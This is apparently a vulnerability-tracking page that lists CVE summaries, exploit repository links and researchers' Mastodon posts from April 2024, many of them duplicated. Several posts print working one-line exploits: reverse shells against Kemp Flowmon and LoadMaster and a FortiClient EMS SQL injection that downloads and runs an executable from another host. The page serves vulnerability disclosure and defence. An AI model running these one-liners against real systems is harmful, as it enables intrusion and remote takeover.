jbhall56@infosec.exchange at 2024-04-25T12:10:52.000Z ##

The security issue has the maximum severity score of 10/10 and was discovered by researchers at Rhino Security Labs. It is currently tracked as CVE-2024-2389. bleepingcomputer.com/news/secu

##

campuscodi@mastodon.social at 2024-04-23T14:30:25.000Z ##

Progress Software has released a patch to fix an unauthenticated command injection vulnerability in its Kemp Flowmon network monitoring suite: support.kemptechnologies.com/h

Rhino Labs has published a write-up on the bug here: rhinosecuritylabs.com/research

The issue is tracked as CVE-2024-2389.

##

wvu@infosec.exchange at 2024-04-23T07:25:19.000Z ##

Progress Kemp Flowmon CVE-2024-2389:

curl -kv 'https://192.168.56.12/service.pdfs/confluence?lang=en&file=`nc+-e+/bin/sh+192.168.56.1+4444`'

##

CVE-2023-44487
(5.3 MEDIUM)

EPSS: 73.93%

updated 2024-04-01T16:13:53

2 posts

## HTTP/2 Rapid reset attack The HTTP/2 protocol allows clients to indicate to the server that a previous stream should be canceled by sending a RST_STREAM frame. The protocol does not require the client and server to coordinate the cancellation in any way, the client may do it unilaterally. The client may also assume that the cancellation will take effect immediately when the server receives the

12 repos

https://github.com/studiogangster/CVE-2023-44487

https://github.com/terrorist/HTTP-2-Rapid-Reset-Client

https://github.com/pabloec20/rapidreset

https://github.com/secengjeff/rapidresetclient

https://github.com/sigridou/CVE-2023-44487-

https://github.com/ReToCode/golang-CVE-2023-44487

https://github.com/nxenon/cve-2023-44487

https://github.com/TYuan0816/cve-2023-44487

https://github.com/bcdannyboy/CVE-2023-44487

https://github.com/imabee101/CVE-2023-44487

https://github.com/ByteHackr/CVE-2023-44487

https://github.com/ndrscodes/http2-rst-stream-attacker

pentesttools at 2024-04-30T11:33:10.581Z ##

Hi there! You look like someone who appreciates the finer things in . 🥨 Snack on these fresh updates which include:

💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner

and MORE!

Check out the video: youtu.be/-CZJhZvErsI?si=l-TOzC

Or the change log: pentest-tools.com/change-log

##

pentesttools@infosec.exchange at 2024-04-30T11:33:10.000Z ##

Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:

💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner

and MORE!

Check out the video: youtu.be/-CZJhZvErsI?si=l-TOzC

Or the change log: pentest-tools.com/change-log

##

CVE-2024-3128
(2.4 LOW)

EPSS: 0.04%

updated 2024-04-01T15:30:38

1 posts

** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, has been found in Replify-Messenger 1.0 on Android. This issue affects some unknown processing of the file androidmanifest.xml of the component Backup File Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The

xje4 at 2024-04-30T10:33:50.314Z ##

Grafana erlaubt als ""Feature"" jedem angemeldeten User beliebige SQL Queries abzusetzen.

CVE-2024-3128

fdlucifer.github.io/2024/04/22

##

CVE-2024-3094
(10.0 CRITICAL)

EPSS: 10.08%

updated 2024-03-29T18:30:50

8 posts

Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. The tarballs included extra .m4 files, which contained instructions for building with automake that did not exist in the repository. These instructions, through a series of complex obfuscations, extract a prebuilt object file from one of the test archives, which is then used to modify specific functions in t

Nuclei template

60 repos

https://github.com/przemoc/xz-backdoor-links

https://github.com/MagpieRYL/CVE-2024-3094-backdoor-env-container

https://github.com/lypd0/CVE-2024-3094-Vulnerabity-Checker

https://github.com/bioless/xz_cve-2024-3094_detection

https://github.com/Bella-Bc/xz-backdoor-CVE-2024-3094-Check

https://github.com/dah4k/CVE-2024-3094

https://github.com/ScrimForever/CVE-2024-3094

https://github.com/gustavorobertux/CVE-2024-3094

https://github.com/felipecosta09/cve-2024-3094

https://github.com/isuruwa/CVE-2024-3094

https://github.com/mightysai1997/CVE-2024-3094

https://github.com/alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer

https://github.com/bsekercioglu/cve2024-3094-Checker

https://github.com/r0binak/xzk8s

https://github.com/0xlane/xz-cve-2024-3094

https://github.com/brinhosa/CVE-2024-3094-One-Liner

https://github.com/hackingetico21/revisaxzutils

https://github.com/zgimszhd61/cve-2024-3094-detect-tool

https://github.com/neuralinhibitor/xzwhy

https://github.com/Juul/xz-backdoor-scan

https://github.com/TheTorjanCaptain/CVE-2024-3094-Checker

https://github.com/Yuma-Tsushima07/CVE-2024-3094

https://github.com/robertdebock/ansible-role-cve_2024_3094

https://github.com/buluma/ansible-role-cve_2024_3094

https://github.com/gayatriracha/CVE-2024-3094-Nmap-NSE-script

https://github.com/fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-

https://github.com/mesutgungor/xz-backdoor-vulnerability

https://github.com/hazemkya/CVE-2024-3094-checker

https://github.com/ashwani95/CVE-2024-3094

https://github.com/CyberGuard-Foundation/CVE-2024-3094

https://github.com/k4t3pr0/Check-CVE-2024-3094

https://github.com/Hacker-Hermanos/CVE-2024-3094_xz_check

https://github.com/mightysai1997/CVE-2024-3094-info

https://github.com/OpensourceICTSolutions/xz_utils-CVE-2024-3094

https://github.com/crfearnworks/ansible-CVE-2024-3094

https://github.com/byinarie/CVE-2024-3094-info

https://github.com/Horizon-Software-Development/CVE-2024-3094

https://github.com/reuteras/CVE-2024-3094

https://github.com/jfrog/cve-2024-3094-tools

https://github.com/emirkmo/xz-backdoor-github

https://github.com/iheb2b/CVE-2024-3094-Checker

https://github.com/MrBUGLF/XZ-Utils_CVE-2024-3094

https://github.com/ackemed/detectar_cve-2024-3094

https://github.com/Fractal-Tess/CVE-2024-3094

https://github.com/weltregie/liblzma-scan

https://github.com/teyhouse/CVE-2024-3094

https://github.com/devjanger/CVE-2024-3094-XZ-Backdoor-Detector

https://github.com/robertdebock/ansible-playbook-cve-2024-3094

https://github.com/Security-Phoenix-demo/CVE-2024-3094-fix-exploits

https://github.com/lockness-Ko/xz-vulnerable-honeypot

https://github.com/Mustafa1986/CVE-2024-3094

https://github.com/galacticquest/cve-2024-3094-detect

https://github.com/wgetnz/CVE-2024-3094-check

https://github.com/FabioBaroni/CVE-2024-3094-checker

https://github.com/amlweems/xzbot

https://github.com/krascovict/OSINT---CVE-2024-3094-

https://github.com/badsectorlabs/ludus_xz_backdoor

https://github.com/harekrishnarai/xz-utils-vuln-checker

https://github.com/pentestfunctions/CVE-2024-3094

https://github.com/Simplifi-ED/CVE-2024-3094-patcher

screaminggoat at 2024-04-26T15:53:22.631Z ##

Sysdig: Meet the Research behind our Threat Research Team – RSA 2024
I thought the title was a typo but Sysdig showcases various threats and vulnerabilities that their threat research team worked on: such as SSH-Snake, Romanian threat actor RUBYCARP, Operation SCARLETEEL, cryptojacking Operation AMBERSQUID, Meson Network, Operation LABRAT, CVE-2024-3094 (XZ Utils), and the Leaky Vessels vulnerabilities. You can meet the threat research team at booth S-742 at RSA Conference 2024, May 6 – 9 in San Francisco.

##

screaminggoat at 2024-04-22T13:45:10.286Z ##

Elaastic on CVE-2024-3094 🔗 discuss.elastic.co/t/elastic-s

On March 29th, 2024, Elastic became aware of the malicious code planted in the xz package. Elastic has performed an investigation to identify any Elastic Products which may be impacted by this issue and we have concluded that no Elastic products use the versions of xz affected by this vulnerability. Therefore, Elastic Products are not affected by this issue.

##

kaito834 at 2024-04-21T14:33:40.837Z ##

XZ UtilsのSWサプライチェーンとOSSエコシステムの話 podcasters.spotify.com/pod/sho 収録日:2024年4月14日

XZ Utilsにおけるバックドア問題(CVE-2024-3094)を題材に同種の問題をどう防げるかの議論

一通り聴き終えた後、自分の整理のためにポイントをまとめてみました
* 立法観点からのソフトウェア開発のセキュリティ要件の強制: EU Cyber Resilience Act
* コードコミットに対するアカウンタビリティの確保: GitHubが取り組んでいるDID(Decentralized Identity、分散型ID)で将来的に改善しないか?
* バックドアが仕掛けられても、すぐにroot権限が奪取されないようにできないか?: SSH認証が回避されただけでシステム全体の侵害につながる運用実装を何とかできないか(例えば、ユーザからの通信をverifyするなど)。軍事の設計・実装が参考になると思うが、要求レベルが異なる民間で同じように採用できるのか

##

sohkamyung@mstdn.io at 2024-04-18T12:31:58.000Z ##

"The recent attempted XZ Utils backdoor (CVE-2024-3094) may not be an isolated incident as evidenced by a similar credible takeover attempt intercepted by the OpenJS Foundation, home to JavaScript projects used by billions of websites worldwide."

openjsf.org/blog/openssf-openj

#Software #Security #Backdoors

##

screaminggoat@infosec.exchange at 2024-04-26T15:53:22.000Z ##

Sysdig: Meet the Research behind our Threat Research Team – RSA 2024
I thought the title was a typo but Sysdig showcases various threats and vulnerabilities that their threat research team worked on: such as SSH-Snake, Romanian threat actor RUBYCARP, Operation SCARLETEEL, cryptojacking Operation AMBERSQUID, Meson Network, Operation LABRAT, CVE-2024-3094 (XZ Utils), and the Leaky Vessels vulnerabilities. You can meet the threat research team at booth S-742 at RSA Conference 2024, May 6 – 9 in San Francisco.

##

simontsui@infosec.exchange at 2024-04-22T13:45:10.000Z ##

Elaastic on CVE-2024-3094 🔗 discuss.elastic.co/t/elastic-s

On March 29th, 2024, Elastic became aware of the malicious code planted in the xz package. Elastic has performed an investigation to identify any Elastic Products which may be impacted by this issue and we have concluded that no Elastic products use the versions of xz affected by this vulnerability. Therefore, Elastic Products are not affected by this issue.

#CVE_2024_3094 #xz #xzbackdoor #supplychainattack

##

tasiaiso@wetdry.world at 2024-04-21T17:54:37.000Z ##

For those that go crying on social media about an application telling you to curl | bash or even to curl | sudo bash because you're running arbitrary code as root:

That is useless unless you plan to carefully review and audit every line of code that runs on your computer.

Even if you do install said app, do you actually trust it's code ? Do you trust it's dependencies ? What about it's subdependencies ?

There's an infinity of ways to infect an open-source repo with bad code, and some of them are actually scarily easy to perform. Do you trust that your favorite compression utility doesn't contain code that backdoors freaking ssh (nvd.nist.gov/vuln/detail/CVE-2) ? Do you trust that a script won't remove a critical system directory because of a misplaced space (github.com/MrMEEE/bumblebee-Ol) ? Or that an ubiquitous logging library can allow remote code execution because of a bad default configuration (en.m.wikipedia.org/wiki/Log4Sh) ?

I hope I can get this message stuck deep inside your head and let you know that unless you make your own operating system from scratch (including your free bootloader, kernel, gpu driver and the rest), you have to trust somebody. And it only takes one mistake to compromise a whole distribution, or even worse. You have to balance between having a new shiny program and having a new way to get shelled.

##

sohkamyung@mstdn.io at 2024-04-18T12:31:58.000Z ##

"The recent attempted XZ Utils backdoor (CVE-2024-3094) may not be an isolated incident as evidenced by a similar credible takeover attempt intercepted by the OpenJS Foundation, home to JavaScript projects used by billions of websites worldwide."

openjsf.org/blog/openssf-openj

#Software #Security #Backdoors

##

CVE-2023-48788
(9.8 CRITICAL)

EPSS: 56.22%

updated 2024-03-19T09:30:32

4 posts

A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets.

1 repos

https://github.com/horizon3ai/CVE-2023-48788

catc0n at 2024-04-26T21:29:01.741Z ##

Good haul this week, including modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 rapid7.com/blog/post/2024/04/2

##

wvu at 2024-04-23T07:20:37.220Z ##

CVE-2023-48788 RCE:

echo -ne "MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'CURL -O 192.168.56.1/X.EXE&X.EXE&DEL X.EXE';--\nX-FCCK-REGISTER:\r\n" | ncat --ssl 192.168.56.101 8013

##

catc0n@infosec.exchange at 2024-04-26T21:29:01.000Z ##

Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 rapid7.com/blog/post/2024/04/2

##

wvu@infosec.exchange at 2024-04-23T07:20:37.000Z ##

CVE-2023-48788 RCE:

echo -ne "MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'CURL -O 192.168.56.1/X.EXE&X.EXE&DEL X.EXE';--\nX-FCCK-REGISTER:\r\n" | ncat --ssl 192.168.56.101 8013

##

CVE-2023-48795
(5.9 MEDIUM)

EPSS: 96.23%

updated 2024-03-14T21:48:10

2 posts

### Summary Terrapin is a prefix truncation attack targeting the SSH protocol. More precisely, Terrapin breaks the integrity of SSH's secure channel. By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary amount of messages sent by the client or server at the beginning of the secure channel without the client or server noticing it. ### Mitigations

Nuclei template

1 repos

https://github.com/RUB-NDS/Terrapin-Artifacts

screaminggoat at 2024-04-22T18:00:56.737Z ##

Jenkins security advisory from 17 April 2024 patched against the Terrapin Attack vulnerability CVE-2023-48795 🔗 jenkins.io/security/advisory/2

##

simontsui@infosec.exchange at 2024-04-22T18:00:56.000Z ##

Jenkins security advisory from 17 April 2024 patched against the Terrapin Attack vulnerability CVE-2023-48795 🔗 jenkins.io/security/advisory/2

#CVE_2023_48795 #Terrapin #vulnerability #Jenkins

##

CVE-2024-27199
(7.3 HIGH)

EPSS: 0.90%

updated 2024-03-11T15:15:47.663000

2 posts

In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible

Nuclei template

3 repos

https://github.com/Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-

https://github.com/W01fh4cker/CVE-2024-27198-RCE

https://github.com/Stuub/RCity-CVE-2024-27198

SophosXOps at 2024-04-18T22:35:27.968Z ##

We posted in March about two authentication-bypass vulnerabilities, CVE-2024-27198 and CVE-2024-27199, discovered in the web component of the on-premises version of JetBrains’ TeamCity CI/CD server. Our MDR team has noticed a new wrinkle in attacks against TeamCity CVEs, meriting another thread – and your attention.

##

SophosXOps@infosec.exchange at 2024-04-18T22:35:27.000Z ##

We posted in March about two authentication-bypass vulnerabilities, CVE-2024-27198 and CVE-2024-27199, discovered in the web component of the on-premises version of JetBrains’ TeamCity CI/CD server. Our MDR team has noticed a new wrinkle in attacks against TeamCity CVEs, meriting another thread – and your attention.

##

SophosXOps at 2024-04-18T22:35:27.968Z ##

We posted in March about two authentication-bypass vulnerabilities, CVE-2024-27198 and CVE-2024-27199, discovered in the web component of the on-premises version of JetBrains’ TeamCity CI/CD server. Our MDR team has noticed a new wrinkle in attacks against TeamCity CVEs, meriting another thread – and your attention.

##

SophosXOps@infosec.exchange at 2024-04-18T22:35:27.000Z ##

We posted in March about two authentication-bypass vulnerabilities, CVE-2024-27198 and CVE-2024-27199, discovered in the web component of the on-premises version of JetBrains’ TeamCity CI/CD server. Our MDR team has noticed a new wrinkle in attacks against TeamCity CVEs, meriting another thread – and your attention.

##

CVE-2024-21901
(4.7 MEDIUM)

EPSS: 0.04%

updated 2024-03-08T18:30:35

2 posts

A SQL injection vulnerability has been reported to affect myQNAPcloud. If exploited, the vulnerability could allow authenticated administrators to inject malicious code via a network. We have already fixed the vulnerability in the following versions: myQNAPcloud 1.0.52 ( 2023/11/24 ) and later QTS 4.5.4.2627 build 20231225 and later

screaminggoat at 2024-04-29T19:27:12.989Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-04-29T19:27:12.000Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

##

CVE-2024-21900
(4.3 MEDIUM)

EPSS: 0.05%

updated 2024-03-08T18:30:35

2 posts

An injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.3.2578 build 20231110 and later QuTS hero h5.1.3.2578 build 20231110 and later QuTScloud c5.1.5.2651 and later

screaminggoat at 2024-04-29T19:27:12.989Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-04-29T19:27:12.000Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

##

CVE-2024-21899
(9.8 CRITICAL)

EPSS: 0.09%

updated 2024-03-08T18:30:35

2 posts

An improper authentication vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to compromise the security of the system via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.3.2578 build 20231110 and later QTS 4.5.4.2627 build 20231225 and later QuTS hero h5.1.3.2578 build 20231110

screaminggoat at 2024-04-29T19:27:12.989Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-04-29T19:27:12.000Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

##

CVE-2024-1709
(10.0 CRITICAL)

EPSS: 94.46%

updated 2024-03-01T05:06:28

2 posts

ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.

Nuclei template

4 repos

https://github.com/sxyrxyy/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass

https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE

https://github.com/cjybao/CVE-2024-1709-and-CVE-2024-1708

https://github.com/HussainFathy/CVE-2024-1709

screaminggoat at 2024-04-19T21:34:37.694Z ##

@brett and not for the massively exploited zero-day vulnerability that ConnectWise refused to get a CVE ID assigned for this year? CISA had to step in 2 days later to get CVE-2024-1708 and CVE-2024-1709, which by then was getting exploited in the wild. connectwise.com/company/trust/

##

simontsui@infosec.exchange at 2024-04-19T21:34:37.000Z ##

@brett and not for the massively exploited zero-day vulnerability that ConnectWise refused to get a CVE ID assigned for this year? CISA had to step in 2 days later to get CVE-2024-1708 and CVE-2024-1709, which by then was getting exploited in the wild. connectwise.com/company/trust/

##

CVE-2024-1708
(8.5 HIGH)

EPSS: 0.05%

updated 2024-02-22T15:30:39

2 posts

ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulnerability, which may allow an attacker the ability to execute remote code or directly impact confidential data or critical systems.

2 repos

https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE

https://github.com/cjybao/CVE-2024-1709-and-CVE-2024-1708

screaminggoat at 2024-04-19T21:34:37.694Z ##

@brett and not for the massively exploited zero-day vulnerability that ConnectWise refused to get a CVE ID assigned for this year? CISA had to step in 2 days later to get CVE-2024-1708 and CVE-2024-1709, which by then was getting exploited in the wild. connectwise.com/company/trust/

##

simontsui@infosec.exchange at 2024-04-19T21:34:37.000Z ##

@brett and not for the massively exploited zero-day vulnerability that ConnectWise refused to get a CVE ID assigned for this year? CISA had to step in 2 days later to get CVE-2024-1708 and CVE-2024-1709, which by then was getting exploited in the wild. connectwise.com/company/trust/

##

CVE-2024-1212
(10.0 CRITICAL)

EPSS: 0.21%

updated 2024-02-21T18:31:06

4 posts

Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.

Nuclei template

1 repos

https://github.com/Chocapikk/CVE-2024-1212

pentesttools at 2024-04-30T11:33:10.581Z ##

Hi there! You look like someone who appreciates the finer things in . 🥨 Snack on these fresh updates which include:

💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner

and MORE!

Check out the video: youtu.be/-CZJhZvErsI?si=l-TOzC

Or the change log: pentest-tools.com/change-log

##

wvu at 2024-04-23T07:11:36.254Z ##

CVE-2024-1212 reverse root shell:

curl -kv "https://192.168.56.4/access/set?param=enableapi&value=1" -u "';ssh -oProxyCommand=';sh&>/dev/tcp/192.168.56.1/4444<&1' vulncheck.com #:"

##

pentesttools@infosec.exchange at 2024-04-30T11:33:10.000Z ##

Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:

💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner

and MORE!

Check out the video: youtu.be/-CZJhZvErsI?si=l-TOzC

Or the change log: pentest-tools.com/change-log

##

wvu@infosec.exchange at 2024-04-23T07:11:36.000Z ##

CVE-2024-1212 reverse root shell:

curl -kv "https://192.168.56.4/access/set?param=enableapi&value=1" -u "';ssh -oProxyCommand=';sh&>/dev/tcp/192.168.56.1/4444<&1' vulncheck.com #:"

##

CVE-2020-3259
(7.5 HIGH)

EPSS: 1.93%

updated 2024-02-16T02:00:03.227000

2 posts

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to retrieve memory contents on an affected device, which could lead to the disclosure of confidential information. The vulnerability is due to a buffer tracking issue when the software parses invalid URLs

GossiTheDog@cyberplace.social at 2024-04-24T18:13:38.000Z ##

In light of recent events, probably best to make this ASA vuln public in public interest: github.com/GossiTheDog/Exploit

If you get <argument> back with toke inside, not vuln. If you get a memory dump back, you vuln. The dump is pretty bad as it contains a bunch of stuff.

The path exists even with webvpn disabled, it's the host checker.

Credits to person who found it, don't know if they want to be named. Edit: it’s @Naproxen

Akira and others have been living off this for a while.

##

GossiTheDog@cyberplace.social at 2024-04-24T18:13:38.000Z ##

In light of recent events, probably best to make this ASA vuln public in public interest: github.com/GossiTheDog/Exploit

If you get <argument> back with toke inside, not vuln. If you get a memory dump back, you vuln. The dump is pretty bad as it contains a bunch of stuff.

The path exists even with webvpn disabled, it's the host checker.

Credits to person who found it, don't know if they want to be named. Edit: it’s @Naproxen

Akira and others have been living off this for a while.

##

CVE-2023-50386(CVSS UNKNOWN)

EPSS: 87.24%

updated 2024-02-09T21:53:15

2 posts

Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of File with Dangerous Type, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Solr.This issue affects Apache Solr from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1. In the affected versions, Solr ConfigSets accepted Java jar and class files to be uploaded through the ConfigSets API. When b

1 repos

https://github.com/vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC

catc0n at 2024-04-26T21:29:01.741Z ##

Good haul this week, including modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 rapid7.com/blog/post/2024/04/2

##

catc0n@infosec.exchange at 2024-04-26T21:29:01.000Z ##

Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 rapid7.com/blog/post/2024/04/2

##

CVE-2023-20198
(10.0 CRITICAL)

EPSS: 87.33%

updated 2024-02-03T05:07:29

2 posts

